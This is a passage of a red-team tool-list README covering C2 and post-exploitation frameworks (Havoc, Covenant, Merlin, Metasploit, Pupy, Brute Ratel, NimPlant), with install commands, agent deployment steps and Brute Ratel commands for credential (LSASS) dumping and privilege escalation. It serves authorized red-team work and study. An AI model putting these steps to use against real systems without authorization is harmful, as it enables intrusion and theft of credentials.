href="https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png"><img src="https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://lots-project.com/" rel="nofollow">https://lots-project.com/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/HavocFramework/Havoc">Havoc</a></h3><a id="user-content-havoc" class="anchor" aria-label="Permalink: 🔙Havoc" href="#havoc"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 
1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Havoc is a modern and malleable post-exploitation command and control framework, created by <a href="https://twitter.com/C5pider" rel="nofollow">@C5pider</a>.</p> <p dir="auto">Features include: Sleep Obfuscation, x64 return address spoofing, Indirect Syscalls for Nt* APIs</p> <p dir="auto"><strong>Pre-requisites:</strong> (Ubuntu 20.04 / 22.04)</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install build-essential sudo add-apt-repository ppa:deadsnakes/ppa sudo apt update sudo apt install python3.10 python3.10-dev"><pre>sudo apt install build-essential sudo add-apt-repository ppa:deadsnakes/ppa sudo apt update sudo apt install python3.10 python3.10-dev</pre></div> <p dir="auto"><strong>Build + Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/HavocFramework/Havoc.git cd Havoc/Client make ./Havoc "><pre>git clone https://github.com/HavocFramework/Havoc.git <span class="pl-c1">cd</span> Havoc/Client make ./Havoc </pre></div> <p dir="auto"><strong>Pre-requisites:</strong> (Ubuntu 20.04 / 22.04)</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="cd Havoc/Teamserver go mod download golang.org/x/sys go mod download github.com/ugorji/go"><pre><span class="pl-c1">cd</span> Havoc/Teamserver go mod download golang.org/x/sys go mod download github.com/ugorji/go</pre></div> <p dir="auto"><strong>Build + Usage:</strong></p> <div 
class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="cd Teamserver ./Install.sh make ./teamserver -h"><pre><span class="pl-c1">cd</span> Teamserver ./Install.sh make ./teamserver -h</pre></div> <p dir="auto"><strong>Run the teamserver</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug"><pre>sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug</pre></div> <p dir="auto"><em>Full install, build and run instructions on the <a href="https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD">wiki</a></em></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png"><img src="https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/cobbr/Covenant">Covenant</a></h3><a id="user-content-covenant" class="anchor" aria-label="Permalink: 🔙Covenant" href="#covenant"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 
2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Covenant is a .NET command and control framework; it has a web interface that allows for multi-user collaboration.</p> <p dir="auto">It can be used to remotely control compromised systems and perform a variety of different tasks, including executing arbitrary code, capturing keystrokes, exfiltrating data, and more.</p> <p dir="auto"><strong>Install: (Dotnet Core)</strong></p> <p dir="auto">You can download dotnet core for your platform from <a href="https://dotnet.microsoft.com/download/dotnet-core/3.1" rel="nofollow">here</a>.</p> <p dir="auto"><strong>Note:</strong> <em>After starting Covenant, you must register an initial user through the web interface. Navigating to the web interface will allow you to register the initial user.</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant"><pre>git clone --recurse-submodules https://github.com/cobbr/Covenant <span class="pl-c1">cd</span> Covenant/Covenant</pre></div> <p dir="auto"><strong>Usage: (Dotnet Core)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="~/Covenant/Covenant > dotnet run warn: Microsoft.EntityFrameworkCore.Model.Validation[10400] Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development. WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated. Covenant has started! 
Navigate to https://127.0.0.1:7443 in a browser"><pre><span class="pl-k">~</span>/Covenant/Covenant <span class="pl-k">></span> dotnet run warn: Microsoft.EntityFrameworkCore.Model.Validation[10400] Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development. WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated. Covenant has started<span class="pl-k">!</span> Navigate to https://127.0.0.1:7443 <span class="pl-k">in</span> a browser</pre></div> <p dir="auto"><strong>Install: (Docker)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Build the docker image: git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant ~/Covenant/Covenant > docker build -t covenant ."><pre><span class="pl-c"><span class="pl-c">#</span> Build the docker image:</span> git clone --recurse-submodules https://github.com/cobbr/Covenant <span class="pl-c1">cd</span> Covenant/Covenant <span class="pl-k">~</span>/Covenant/Covenant <span class="pl-k">></span> docker build -t covenant <span class="pl-c1">.</span></pre></div> <p dir="auto"><strong>Usage: (Docker)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run Covenant within the Docker container ~/Covenant/Covenant > docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant # Stop the container ~/Covenant/Covenant > docker stop covenant # Restart Covenant interactively ~/Covenant/Covenant > docker start covenant -ai"><pre><span class="pl-c"><span class="pl-c">#</span> Run Covenant within the Docker container</span> <span 
class="pl-k">~</span>/Covenant/Covenant <span class="pl-k">></span> docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v <span class="pl-k"><</span>/absolute/path/to/Covenant/Covenant/Data<span class="pl-k">></span>:/app/Data covenant <span class="pl-c"><span class="pl-c">#</span> Stop the container</span> <span class="pl-k">~</span>/Covenant/Covenant <span class="pl-k">></span> docker stop covenant <span class="pl-c"><span class="pl-c">#</span> Restart Covenant interactively</span> <span class="pl-k">~</span>/Covenant/Covenant <span class="pl-k">></span> docker start covenant -ai</pre></div> <p dir="auto">Full installation and startup instructions can be found on the wiki <a href="https://github.com/cobbr/Covenant/wiki/Installation-And-Startup">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png"><img src="https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image from <a href="https://github.com/cobbr/Covenant">https://github.com/cobbr/Covenant</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Ne0nd0g/merlin">Merlin</a></h3><a id="user-content-merlin" class="anchor" aria-label="Permalink: 🔙Merlin" href="#merlin"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 
1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Merlin is an open-source post-exploitation framework that is designed to be used after an initial compromise of a system.</p> <p dir="auto">It is written in Python and can be used to perform a variety of different tasks, such as executing arbitrary code, moving laterally through a network, and exfiltrating data.</p> <p dir="auto"><strong>Install:</strong></p> <ol dir="auto"> <li>Download the latest compiled version of Merlin Server from the <a href="https://github.com/Ne0nd0g/merlin/releases">releases</a> section</li> <li>Extract the files with 7zip using the <code>x</code> (extract) function. The archive password is: <code>merlin</code></li> <li>Start Merlin</li> <li>Configure a <a href="https://merlin-c2.readthedocs.io/en/latest/server/menu/listeners.html" rel="nofollow">listener</a></li> <li>Deploy an agent. See the <a href="https://merlin-c2.readthedocs.io/en/latest/quickStart/agent.html" rel="nofollow">Agent Execution Quick Start Guide</a> for examples</li> </ol> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="mkdir /opt/merlin;cd /opt/merlin wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z sudo ./merlinServer-Linux-x64"><pre>mkdir /opt/merlin<span class="pl-k">;</span><span class="pl-c1">cd</span> /opt/merlin wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z sudo ./merlinServer-Linux-x64</pre></div> <p dir="auto"><strong>Usage:</strong></p> <ol dir="auto"> <li>Ensure the Merlin server is running with a configured listener</li> <li>Download and deploy an agent to the victim</li> <li>Execute the agent</li> </ol> <p dir="auto">For detailed usage information see the official Merlin <a 
href="https://merlin-c2.readthedocs.io/en/latest/server/menu/main.html" rel="nofollow">wiki</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png"><img src="https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image from <a href="https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks" rel="nofollow">https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework</a></h3><a id="user-content-metasploit-framework" class="anchor" aria-label="Permalink: 🔙Metasploit Framework" href="#metasploit-framework"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Metasploit is an open-source framework for developing, testing, and using exploit code.</p> <p dir="auto">The Metasploit framework includes a large number of pre-built exploits and payloads, as well as a fully-featured integrated development environment (IDE) for creating and testing custom exploits.</p> 
<p dir="auto"><strong>Install: (Installer)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall"><pre>curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb <span class="pl-k">></span> msfinstall <span class="pl-k">&&</span> \ chmod 755 msfinstall <span class="pl-k">&&</span> \ ./msfinstall</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="/opt/metasploit-framework/bin/msfconsole"><pre>/opt/metasploit-framework/bin/msfconsole</pre></div> <p dir="auto">Full installation instructions can be found on the official <a href="https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html" rel="nofollow">wiki</a>.</p> <p dir="auto"><a href="https://www.rapid7.com/blog/tag/metasploit/" rel="nofollow">Rapid7 Metasploit blogs</a></p> <p dir="auto"><a href="https://cdn.comparitech.com/wp-content/uploads/2019/06/Metasploit-Cheat-Sheet.webp" rel="nofollow">Cheat sheet graphic</a></p> <p dir="auto"><a href="https://github.com/security-cheatsheet/metasploit-cheat-sheet">Nice command list</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png"><img src="https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://goacademy.io/how-to-install-metasploit-on-kali-linux/" 
rel="nofollow">https://goacademy.io/how-to-install-metasploit-on-kali-linux/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/n1nj4sec/pupy">Pupy</a></h3><a id="user-content-pupy" class="anchor" aria-label="Permalink: 🔙Pupy" href="#pupy"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in python and C.</p> <p dir="auto">It allows an attacker to remotely control a victim's computer and execute various actions, such as command execution, key logging, and taking screen shots.</p> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv git clone --recursive https://github.com/n1nj4sec/pupy cd pupy python create-workspace.py -DG pupyw"><pre>sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv git clone --recursive https://github.com/n1nj4sec/pupy <span class="pl-c1">cd</span> pupy python create-workspace.py -DG pupyw</pre></div> 
<p dir="auto">Pin rpyc to an older version to fix the error:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo pip2 install rpyc==3.4.4"><pre>sudo pip2 install rpyc==3.4.4</pre></div> <p dir="auto">Start:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="export PATH=$PATH:~/.local/bin; pupysh pupyws/bin/pupysh"><pre><span class="pl-k">export</span> PATH=<span class="pl-smi">$PATH</span>:<span class="pl-k">~</span>/.local/bin<span class="pl-k">;</span> pupysh pupyws/bin/pupysh</pre></div> <p dir="auto"><em>Git install instructions used from <a href="https://kalitut.com/how-to-install-pupy/" rel="nofollow">here</a>.</em></p> <p dir="auto"><strong>Install: (Docker)</strong></p> <p dir="auto">For detailed Docker and Pupy installation instructions, see the <a href="https://github.com/n1nj4sec/pupy/wiki/Installation">wiki</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Get help page for any builtin commands with -h >> sessions -h >> jobs -h >> run -h # Interact with session 1 >> sessions -i 1 # Run local command 'ls' >> !ls"><pre><span class="pl-c"><span class="pl-c">#</span> Get help page for any builtin commands with -h</span> <span class="pl-k">>></span> sessions -h <span class="pl-k">>></span> <span class="pl-c1">jobs</span> -h <span class="pl-k">>></span> run -h <span class="pl-c"><span class="pl-c">#</span> Interact with session 1</span> <span class="pl-k">>></span> sessions -i 1 <span class="pl-c"><span class="pl-c">#</span> Run local command 'ls'</span> <span class="pl-k">>></span> <span class="pl-k">!</span>ls</pre></div> <p dir="auto">Full usage information can be found on the <a href="https://github.com/n1nj4sec/pupy/wiki/Basic-Usage">wiki</a>.</p> <p 
dir="auto">The wiki contains good <a href="https://github.com/n1nj4sec/pupy/wiki/Post-Exploitation">post exploitation information</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png"><img src="https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/n1nj4sec/pupy/wiki/Screenshots">https://github.com/n1nj4sec/pupy/wiki/Screenshots</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://bruteratel.com/" rel="nofollow">Brute Ratel</a></h3><a id="user-content-brute-ratel" class="anchor" aria-label="Permalink: 🔙Brute Ratel" href="#brute-ratel"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">BruteRatel is a great command and control (C4) framework created by <a href="https://twitter.com/NinjaParanoid" rel="nofollow">@NinjaParanoid</a>. 
The framework consists of a client component 'badger' that is installed on the compromised system, and a server component 'commander' that is run by the red team.</p> <p dir="auto">The client and server communicate with each other using various communication channels, such as HTTP, DNS, or TCP, and can be configured to use different encoding and encryption methods to evade detection.</p> <p dir="auto">Some nice features:</p> <ul dir="auto"> <li>DNS Over HTTPS</li> <li>Indirect Syscalls</li> <li>Built-in Debugger To Detect EDR Userland Hooks</li> <li>MITRE graph integration</li> <li>Adversary TTP automation</li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">To legally get access to the framework you will need to buy a licence (1 Year $2500 per user). See the <a href="https://bruteratel.com/pricing/" rel="nofollow">pricing page</a> for more information.</p> <p dir="auto">After purchase you can download the framework from <a href="https://bruteratel.com/tabs/download/" rel="nofollow">here</a> with your Activation Key and License User ID.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Loads a powershell script to memory which can be Invoked using psreflect psimport # Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock lock_input # Dumps user clipboard dumpclip # Enumerates basic domain information dcenum # Elevates user privileges to SYSTEM (Requires admin rights) get_system # Takes a screenshot of current desktop and stores it on the server screenshot # Dumps LSASS to C:\Windows\Memory.DMP using the PssCaptureSnapshot technique shadowclone"><pre><span class="pl-c"><span class="pl-c">#</span> Loads a powershell script to memory which can be Invoked using psreflect</span> psimport <span class="pl-c"><span class="pl-c">#</span> Locks keyboard and mouse hardware input. 
Use ‘unlock_input’ command to unlock</span> lock_input <span class="pl-c"><span class="pl-c">#</span> Dumps user clipboard</span> dumpclip <span class="pl-c"><span class="pl-c">#</span> Enumerates basic domain information</span> dcenum <span class="pl-c"><span class="pl-c">#</span> Elevates user privileges to SYSTEM (Requires admin rights)</span> get_system <span class="pl-c"><span class="pl-c">#</span> Takes a screenshot of current desktop and stores it on the server</span> screenshot <span class="pl-c"><span class="pl-c">#</span> Dumps LSASS to C:\Windows\Memory.DMP using the PssCaptureSnapshot technique</span> shadowclone</pre></div> <p dir="auto">Full commander terminal usage information can be found <a href="https://bruteratel.com/tabs/badger/badgers/" rel="nofollow">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png"><img src="https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://bruteratel.com/" rel="nofollow">https://bruteratel.com/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/chvancooten/NimPlant">NimPlant</a></h3><a id="user-content-nimplant" class="anchor" aria-label="Permalink: 🔙NimPlant" href="#nimplant"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 
1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A light-weight first-stage C2 implant written in Nim.</p> <p dir="auto">Features:</p> <ul dir="auto"> <li>Lightweight and configurable implant written in the Nim programming language</li> <li>Encryption and compression of all traffic by default, obfuscates static strings in implant artefacts</li> <li>Support for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables</li> <li>Easy deployment of more advanced functionality or payloads via <code>inline-execute</code>, <code>shinject</code> (using dynamic invocation), or in-thread <code>execute-assembly</code></li> <li>Comprehensive logging of all interactions and file operations</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl https://nim-lang.org/choosenim/init.sh -sSf | sh choosenim stable git clone https://github.com/chvancooten/NimPlant cd client nimble install -d pip3 install -r server/requirements.txt apt install mingw-w64"><pre>curl https://nim-lang.org/choosenim/init.sh -sSf <span class="pl-k">|</span> sh choosenim stable git clone https://github.com/chvancooten/NimPlant <span class="pl-c1">cd</span> client nimble install -d pip3 install -r server/requirements.txt apt install mingw-w64</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Generate payloads python .\NimPlant.py compile all # Start server python .\NimPlant.py server "><pre><span class="pl-c"><span class="pl-c">#</span> Generate payloads</span> python .<span class="pl-cce">\N</span>imPlant.py compile all 
<span class="pl-c"><span class="pl-c">#</span> Start server</span> python .<span class="pl-cce">\N</span>imPlant.py server </pre></div> <p dir="auto">Before running make sure to create the <code>config.tool</code> configuration file, more information can be found <a href="https://github.com/chvancooten/NimPlant#getting-started">here</a>.</p> <p dir="auto">Full usage information can be found <a href="https://github.com/chvancooten/NimPlant#usage">here</a>.</p> <p dir="auto"><a href="https://casvancooten.com/posts/2021/08/building-a-c2-implant-in-nim-considerations-and-lessons-learned/" rel="nofollow">Blog - Building a C2 Implant in Nim - Considerations and Lessons Learned</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png"><img src="https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://casvancooten.com" rel="nofollow">https://casvancooten.com</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/t3l3machus/hoaxshell">Hoaxshell</a></h3><a id="user-content-hoaxshell" class="anchor" aria-label="Permalink: 🔙Hoaxshell" href="#hoaxshell"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 
